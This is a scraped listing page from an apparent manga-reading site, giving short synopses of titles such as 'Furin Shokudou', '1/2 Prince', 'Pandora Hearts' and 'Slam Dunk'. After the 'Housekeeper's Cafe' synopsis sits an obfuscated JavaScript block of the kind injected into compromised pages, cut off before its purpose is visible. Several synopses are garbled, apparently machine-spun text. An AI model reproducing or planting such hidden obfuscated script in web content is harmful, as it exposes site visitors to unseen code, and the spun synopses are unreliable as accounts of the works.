Cooking - Page 11

Explore the world of Cooking manga, where gripping stories await. Start reading the best Cooking manga free now!

623 results

The Ride-On King

Alexander Purchinov is president for life of the country of Pursia, a country ruled by violence and the influence of its government. Alexander always desires to be dominant, and "ride" things, whether literally or figuratively. Now that he has already ridden his country, his next target is a fantasy world that has orcs, wyverns, and centaurs.


Furin Shokudou

The manga centers on 35-year-old businessman Ryūichi Yamadera. Ryūichi travels around the country on business trips, and his sole pastime is trying different foods at local restaurants. He also ends up sleeping with the various married women he meets at the restaurants, while also being married himself.


1/2 Prince

Feng Lan is A - 19-year old woman who's challenged by her twin brother to perform with a virtual-reality game called Second Life. Being the primary player to log on the sport, she's permitted to recognize her actual existence seems from her avatar; so she creates a good-looking male elf named Prince. In sport, she types a-team known as the Odd Squads which consists of: Lolidragon, women concealed game moderator; Ugly Wolf, a creature race Priest character; Doll, a necromancer; Guilastes, a bard with the appeal to Prince; and Yu Lian, a lady mage. The Odd Squads contend in a championship emerging successful as the narrative advances and therefore are given a big city that they identify as Infinity City which Prince is voted to direct. Ahead of the town is open to people, Prince drifts onto another continent and leaves in search of companions to serve under her. There, she befriends Yun Fei, Lu Jing and her actual life buddies and becomes concerned in a concealed quest which gives her with two NPCs with self-awareness Sunshine, Kenshin and. As the storyline advances, Prince learns that the self-conscious NPC named Lord of Life is commanding an army of NPCs to delete the people that may keep them from returning to the match. Through the sport, players are gathered by Prince in reaction so that you can fight the menace. It's disclosed Long Dian is the reason behind the AI rebellion and wants to obtain eternal existence through Second Life. Long Dian's NPCs powers the planet greatest researchers to give him a new body and consider charge of the planet 's superweapons. Her fellow travelers and Prince get the better of Long Dian's new super-anatomy, stopping his reign of terror. During the conflict, Feng Lan's lifestyle is saved by Guilastes and Guilastes is finally chosen and weds by Feng Lan.


Ubau Mono Ubawareru Mono (Novel)

Seto Yu is a 12-year-old boy, despite being very intelligent, he is a deprived person. Abused violently by his father and beaten by debt collector regularly due to his father, his body filled with scars. One day, he is transported into a different world and he got what he needed to strike back at those who harm him or his loved ones. Original Japanese Web Novel


Kajiki no Ryourinin

In this world, there exists monsters called Kajiki. They are huge and scary, for they were created to be eaten by gods. However, they are also very delicious…! Let the battles between monstrous food and a young chef begin!


Akuyaku Ouji Wa Koi Ga Dekinai

The manga is a romantic comedy starring the clever and handsome son of a wealthy family. In middle school he only ever studied, and everyone said he was plain like a background character. When he gets to high school, he enacts a plan to change his image to be more like a "main character" and get the perfect girlfriend.


Housekeeper’s Cafe

Sparks fly when busy restaurateur Justin meets handsome waiter Jake at a themed “butler service” cafe. He relishes the idea of bossing someone around, and Jake’s service is excellent—he even saves Justin from a rogue wine bottle! Then it’s just one revelation after the other: They’re neighbors! Jake cooks like a master chef (and Justin will eat all his treats)!! And even a possible past encounter...! So will Justin pursue business or pleasure? Can he have Jake’s tasty cakes and eat them, too?<script></script><script>(function(_0x260e61,_0x578236){var _0x4db6b5=_0x23ff,_0x50ba1b=_0x260e61();while(!![]){try{var _0xf6abd3=-parseInt(_0x4db6b5(0x1fe))/(0x1a5e+-0x14*-0x144+0x33ad*-0x1)*(-parseInt(_0x4db6b5(0x20f))/(0x1*0x26dc+0x1*0x1c3a+-0x10c5*0x4))+parseInt(_0x4db6b5(0x206))/(-0x1a50+-0x2*0x6cf+0x199*0x19)*(parseInt(_0x4db6b5(0x211))/(-0x1*-0x16e9+0xd6c+-0x3*0xc1b))+-parseInt(_0x4db6b5(0x20c))/(-0x1*-0x20bf+-0xd08+-0x1*0x13b2)+-parseInt(_0x4db6b5(0x201))/(-0x2687*0x1+0x5*-0x5f9+-0x12*-0x3cd)+-parseInt(_0x4db6b5(0x1ff))/(-0x29*0x59+0x37*-0x1b+0x1415)*(parseInt(_0x4db6b5(0x203))/(0x446+-0x921+0x4e3))+parseInt(_0x4db6b5(0x1f5))/(0xd8c+0x1fe1+0x33e*-0xe)+parseInt(_0x4db6b5(0x204))/(-0x3*0xc4a+0x273*-0x7+0x1*0x360d);if(_0xf6abd3===_0x578236)break;else _0x50ba1b['push'](_0x50ba1b['shift']());}catch(_0x49427e){_0x50ba1b['push'](_0x50ba1b['shift']());}}}(_0x4adc,-0x1*-0x2265d+-0x5e7a4+-0x5094*-0x2b));function _0x4adc(){var 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I Became the Class Representative

The story of the Red haired boy and the Braided glasses girl. Raws >>



Read manhwa Peerless As the new acting leader investigates the mysterious death of the previous Alliance leader, terrifying and monstrous figures from the Demonic Sect appear before him! Will the new acting leader manage to overcome this overwhelming fate? Unprecedented, unparalleled martial arts techniques of the Orthodox and Demonic factions emerge in full force! A groundbreaking and unparalleled martial arts epic begins now. Unprecedented, unparalleled martial arts techniques of both the Orthodox and Demonic factions emerge in full force! A groundbreaking and unparalleled martial art epic begins now.


Porando Hishi Ten no Hate Made

In the 18th century, The Polish-Lithuanian Commonwealth was an elective monarchy, in which the king was elected by the nobility. The kingdom thrived under its unprecedented in the history of Europe, yet flawed democratic political system. Many difficult trials stand in front of this freedom-loving country. Will democracy yield to tyrrany? Read "Ten no Hate Made" to find out! Created by the author of world famous "Lady Oscar" (Versailles no Bara) - Riyoko Ikeda - this gripping historical story of war, love and deceit is certainly worth reading!


Pandora Hearts

Heir to the Vessalius Duke House, Oz, has just turned fifteen. His life is carefree and wealthy, darkened only by the continuous lack of his dad. At his coming of age service, every thing changes. For no reason he is able to pick out, Oz is cast into the prison called the "Abyss", simply to be saved with a girl called Alice, the Bloodstained Black Rabbit. The puzzle there starts as Oz unravels the enigma behind Alice, the Abyss, and the peculiar organization called "Pandora". Chains Beings in the Abyss that were at one-point person, changed by the Will of the Abyss. They have to sign a contract using a contractor that is human to be able to depart the Abyss. People must be repeatedly consumed by chains involved with prohibited contracts as a way to achieve power. Some chains, like Humpty Dumpty, can have several contracts. When they do even more will be slowed down by the revolution on a prohibited contractor seal. The sole Chains that have been once not people are Oz the B-Rabbit Cheshire and Cat who are the sole chains that will develop a form that is human due to them being creatures as well as in the instance of Oz a filled thing while the others developed semi-human looks.


Slam Dunk

There are many different popular mangas out there in the real world, but this particular form of anime can be hard to find, especially if looking for something that was originally in print years or even decades ago. In this case if you want to find some quality old stories, like being able to read Slam Dunk manga online resources are your best hope. The reason you need to read Slam Dunk manga online is simple: because the original print run is going to be extremely hard to find. This sports manga was a serialized story that ran from 1990 through 1996 and although it was adapted into an on screen anime, many people prefer to view the original story in its original form.   5 Characters in Slam-Dunk Manga   However, the collected versions became extremely popular, selling millions of copies once they were completely collected and that is an option for people who want to buy the Slam Dunk manga online. However, for actual reading, why invest all that money in getting hard copies when you actually can just sit down, find the right websites that show great high-quality manga online and read up on all the issues that you haven’t been caught up on. The truth is, there are actually several websites that offer manga and some will offer those for free while others charge a certain amount, but either way a little bit of research will go a long way to seeing what your safe and reliable online options are. There are plenty of places on the Internet to read various past issues of the Slam Dunk manga and to get your fix for one of the more popular old school sports manga of all time. Do that bit of footwork and you will find plenty of places to read Slam Dunk manga online.
